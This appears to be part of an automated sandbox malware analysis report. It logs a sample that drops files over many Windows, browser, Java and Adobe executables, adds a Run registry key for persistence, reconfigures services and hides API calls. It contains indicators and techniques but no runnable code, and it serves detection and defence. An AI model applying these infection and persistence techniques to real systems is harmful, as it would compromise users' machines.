Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\user\AppData\Local\Temp\x.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\sppsvc.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\wdmvmswJ.pif	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\sppsvc.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Code function: 30_2_1002CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

30_2_1002CBD0

Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jwsmvmdw			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jwsmvmdw			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B0AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_02B0AB1C

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
